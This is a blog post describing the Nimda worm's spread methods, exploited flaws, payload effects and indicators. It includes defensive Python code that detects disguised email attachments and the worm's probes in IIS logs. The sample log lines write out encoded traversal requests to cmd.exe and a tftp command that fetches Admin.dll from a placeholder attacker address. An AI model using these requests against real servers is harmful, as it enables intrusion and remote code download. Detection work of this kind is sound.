
Wednesday, September 10, 2008

Nimda Virus


"W32/Nimda-A" is more commonly known as the Nimda worm (aliases include Concept5, Code Rainbow and Minda). It affects Microsoft Windows 9x/ME, NT 4.0 and 2000. The name is "admin" spelled backwards. Nimda is a very aggressive self-propagating worm that distributes itself via the following four methods:

  1. Email: The worm is delivered through email containing an attachment named "readme.exe" of the MIME-type "audio/x-wav." The email would only need to be previewed with a vulnerable client in order to trigger infection. The subject of the email is variable and may originate from spoofed email addresses under the guise of trusted sources.

  2. Web server attacks: The worm scans for IIS Web servers that are either still carrying the root.exe backdoor left behind by the Code Red II worm or are directly exploitable. On the latter, Nimda gains control of the server through the IIS Unicode directory-traversal and escaped-character (double) decoding vulnerabilities.

  3. Web browsing code: Nimda appends code to all HTM, HTML, and ASP files residing on infected Web servers. Consequently, users browsing Web sites infected with Nimda may also fall victim to the worm.

  4. Open network shares: Nimda is able to propagate via open network shares that have not been properly secured to deny access from unauthorized sources. This allows for the possibility of distribution within internal networks.
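The email carrier in method 1 works because the client trusts the declared MIME type ("audio/x-wav") rather than the attachment's name or contents. The following is an added example, not code from the original post or from any Nimda analysis: a small gateway-style check that parses a raw message and flags leaf parts whose declared type disagrees with their filename extension or their leading bytes. The sample message is constructed to have the same shape as the carrier described above (a multipart/alternative message with an empty HTML part and an audio/x-wav part named readme.exe); its base64 body is a placeholder MZ stub, not the worm, and the magic-byte table and extension list are the example's own assumptions.

```python
import base64
import email
import os
from email import policy

# Magic bytes a part must start with for a few declared content types (assumed list).
# A part whose bytes do not match what it claims to be is worth stopping at the gateway.
EXPECTED_MAGIC = {
    "audio/x-wav": (b"RIFF",),
    "audio/wav": (b"RIFF",),
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG",),
}
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".com", ".scr", ".pif", ".bat", ".vbs", ".js"}

# Constructed sample shaped like the carrier described in the text: a multipart/alternative
# message with an empty HTML part and an "audio/x-wav" part named readme.exe carrying
# base64 data. FAKE_PE is a placeholder DOS/PE stub header, not the worm.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 28
SAMPLE_MSG = b"""From: someone@example.com
To: victim@example.net
Subject: hello
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0000"

------=_NextPart_000_0000
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY></BODY></HTML>
------=_NextPart_000_0000
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

__B64__
------=_NextPart_000_0000--
""".replace(b"__B64__", base64.b64encode(FAKE_PE))


def part_findings(part):
    """Reasons a leaf MIME part looks like an executable disguised as something harmless."""
    reasons = []
    ctype = part.get_content_type()
    # get_filename() falls back to the Content-Type name= parameter when there is no
    # Content-Disposition header, which is exactly how the carrier named readme.exe.
    name = part.get_filename() or ""
    ext = os.path.splitext(name)[1].lower()
    data = part.get_payload(decode=True) or b""

    if ext in EXECUTABLE_EXTENSIONS and not ctype.startswith("application/"):
        reasons.append(f"executable name {name!r} declared as {ctype}")
    if data.startswith(b"MZ") and not ctype.startswith("application/"):
        reasons.append(f"payload starts with an MZ (PE) header but is declared {ctype}")
    magic = EXPECTED_MAGIC.get(ctype)
    if magic and data and not data.startswith(magic):
        reasons.append(f"payload does not start with the magic bytes of {ctype}")
    return reasons


def scan_message(raw: bytes):
    """Walk every leaf part of a raw RFC 822 message and return
    (filename, content type, reasons) for each part that fails a check."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        reasons = part_findings(part)
        if reasons:
            findings.append((part.get_filename() or "", part.get_content_type(), reasons))
    return findings


if __name__ == "__main__":
    for name, ctype, reasons in scan_message(SAMPLE_MSG):
        print(f"{name} ({ctype}):")
        for r in reasons:
            print("  -", r)
```

On the sample the audio/x-wav part trips all three checks (executable extension under a non-application type, MZ header, and no RIFF signature), while the HTML part is clean. Any one of the three is enough to quarantine; the point of keeping all three is that an attacker can drop the telltale filename but cannot change the bytes the client will execute.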

Nimda exploits four known Microsoft vulnerabilities: the Internet Explorer MIME-header flaw that auto-executes the readme.exe attachment on preview (MS01-020), the IIS Unicode "Web Server Folder Traversal" flaw (MS00-078), the IIS escaped-character "superfluous decoding" flaw (MS01-026), and the root.exe backdoor left behind by Code Red II.

Collateral damage and payloads attributed to the Nimda worm include but are not limited to the following:

  1. Network performance degradation due to high bandwidth consumption during the propagation phase. Nimda has been spreading at an extremely rapid pace and Web site outages and impaired network connectivity have resulted from this worm.

  2. Nimda creates or activates a "Guest" account and grants it administrative privileges.

  3. The worm grants full access to everyone on the C: share. As a result, any unauthorized remote user may connect to this share and read, modify, or delete files on the system.

  4. The Nimda worm enumerates shared network drives and scans recursively for executables. If it finds an executable file, it replaces it with a file of the same name containing the worm.

  5. Nimda scans local hard drives for the file types HTM, HTML, and ASP and appends JavaScript code to further propagate the worm. The worm then creates the file readme.eml that contains a MIME-encoded version of Nimda in the same directory.

  6. All subkeys of the registry key HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security are deleted in order to circumvent network share security measures.

  7. Nimda modifies the [boot] section of system.ini (Shell=explorer.exe load.exe -dontrunold) so that the worm is executed automatically after system startup.

  8. Nimda will create multiple instances of *.eml files and riched20.dll on open network shares even if HTML files are not present on the system. A copyright string appears in the worm that reads "Concept Virus (CV) V.5, Copyright(C) 2001 R.P.China." This string does not necessarily indicate the worm's origin.

Nimda uses several techniques to increase the effectiveness of its email propagation. First, it generates a list of email addresses from the Internet Explorer browser cache and the default MAPI mailbox (which is usually the Inbox for Outlook or Outlook Express). It also caches the subject of the messages found in the MAPI mailbox. It then uses one address at random to be the source of the emails it sends. Nimda also includes its own SMTP client, which will contact the appropriate mail servers for the various targets.

The worm tries several backdoors left by Code Red II, as well as a few other standard attacks. The worm uses regular blocking socket calls. Once the worm finds a vulnerable IIS server, it instructs it to download "admin.dll" from the attacking machine, via TFTP. It does this by sending an attack URL with the TFTP command embedded. It then executes "admin.dll" by sending a URL designed to call the DLL.
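The Web-server stage above leaves a very recognisable trail in IIS logs: a root.exe probe, traversal paths written with overlong UTF-8 (%c0%af, %c1%1c) or double encoding (%255c), and finally a cmd.exe request whose command is the tftp fetch of Admin.dll. The following is an added example, not code from the original post: it reads request paths the way the vulnerable server did (percent-decode, fold overlong two-byte UTF-8, then decode again) so that encoded traversals collapse to "../", and then matches the decoded request against those stages. The log lines are constructed in a simplified W3C extended layout with documentation-range addresses, and the decoder is a deliberately simple model of the two IIS bugs, not a reimplementation of IIS.

```python
from urllib.parse import unquote_to_bytes

# Constructed IIS log lines in a simplified W3C extended layout (date time s-ip method
# uri-stem uri-query port user c-ip user-agent status). One benign request, then the
# probe sequence described in the text: the Code Red II root.exe backdoor, an overlong
# UTF-8 traversal, a double-encoded traversal, and the TFTP fetch of Admin.dll.
# 10.0.0.x and 192.0.2.x are placeholder addresses, not real hosts.
SAMPLE_LOG = """\
2001-09-18 13:01:02 10.0.0.5 GET /index.htm - 80 - 10.0.0.9 Mozilla/4.0 200
2001-09-18 13:01:03 10.0.0.5 GET /scripts/root.exe /c+dir 80 - 192.0.2.10 - 404
2001-09-18 13:01:04 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 80 - 192.0.2.10 - 200
2001-09-18 13:01:05 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 80 - 192.0.2.10 - 200
2001-09-18 13:01:06 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20c:\\Admin.dll 80 - 192.0.2.10 - 502
"""


def lenient_utf8_fold(data: bytes) -> bytes:
    """Model of the decoder bug behind the Unicode traversal: a 0xC0/0xC1 lead byte plus
    the following byte is folded to one ASCII character, although such two-byte forms are
    overlong and the second byte (e.g. 0x1C) need not be a valid continuation byte.
    %c0%af therefore becomes '/', and %c1%1c or %c1%9c becomes '\\'."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def iis_canonical(path: str) -> str:
    """Read a request path the way the vulnerable server did: percent-decode, fold
    overlong UTF-8, then do both again (the superfluous second decode turns %255c into
    %5c and then into '\\'). Backslashes are normalised to '/' and case is lowered."""
    raw = path.encode("ascii", "replace")
    for _ in range(2):
        raw = lenient_utf8_fold(unquote_to_bytes(raw))
    return raw.decode("latin-1").replace("\\", "/").lower()


def classify_request(stem: str, query: str):
    """Return the decoded path and the reasons a request matches the worm's probe pattern."""
    path = iis_canonical(stem)
    cmd = iis_canonical(query) if query != "-" else ""
    reasons = []
    if "/../" in path:
        reasons.append("directory traversal survives decoding")
    if path.endswith("/root.exe"):
        reasons.append("request for the Code Red II root.exe backdoor")
    if path.endswith("/cmd.exe"):
        reasons.append("cmd.exe reached through the web root")
    if "tftp" in cmd:
        reasons.append("tftp fetch in the command (worm download stage)")
    return path, reasons


def scan_log(text: str):
    """Parse the log and return one record per request that matches."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        f = line.split()
        if len(f) < 11 or f[3] != "GET":
            continue
        path, reasons = classify_request(f[4], f[5])
        if reasons:
            hits.append({"line": n, "client": f[8], "path": path,
                         "query": f[5], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h['line']} from {h['client']}: {h['path']}")
        for r in h["reasons"]:
            print("  -", r)
```

Matching on the decoded path rather than on literal strings such as "%c1%1c" is what makes the check hold up: the worm used more than a dozen encodings of the same traversal, and a signature written against any one of them misses the rest, whereas every one of them decodes to "/../" under the model above.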

The most common file names used by the worm are as follows:

  • readme.exe: The name of the worm used in email propagation.

  • readme.eml: The name of the worm used in the propagation by modified Web pages.

  • admin.dll: The file name used during the TFTP transfer from the attacking machine to the victim's. The file is copied to the root directory of all drives. A valid admin.dll exists, because it is a part of the FrontPage Server Extensions package.

  • mmc.exe: File name used by the worm during initial setup. This file will be found in %Windows%\System. "mmc.exe" is the executable for the Microsoft Management Console. The worm overwrites it if it exists.

  • load.exe: File name used by the worm as it copies itself into %Windows%\System.

  • riched20.dll: The worm infects or replaces this DLL file. Various office tools, including Microsoft Word and WordPad, load it, and because Windows searched the current directory for DLLs before the system directory, any such program that opens a document in a directory containing the worm's copy of riched20.dll runs the worm.

Because the worm attaches itself to other executables, infected copies vary and a fixed MD5 checksum is not a useful indicator. Most of the files listed above will be 57,344 bytes in length, but they can be larger if they are attached to an infected program. The infected copies are capable of spreading with the other files attached. It is theoretically possible that a hybrid will be accidentally created as well, if Nimda manages to infect a malicious piece of code and carry it along.

Port Numbers Involved

  • UDP 137–138, TCP 139 and TCP 445: NetBIOS/SMB file sharing. These ports are used in the transmission of the worm over open shares.

  • TCP 80: Hypertext Transfer Protocol. The worm uses this port to target machines, and as a carrier, through infected HTML or ASP files.

  • TCP 25 SMTP: This port is used to send email to targets in the address book.

  • UDP 69 TFTP: This port is used to transfer the worm, once a vulnerable machine is found through direct IP targeting.
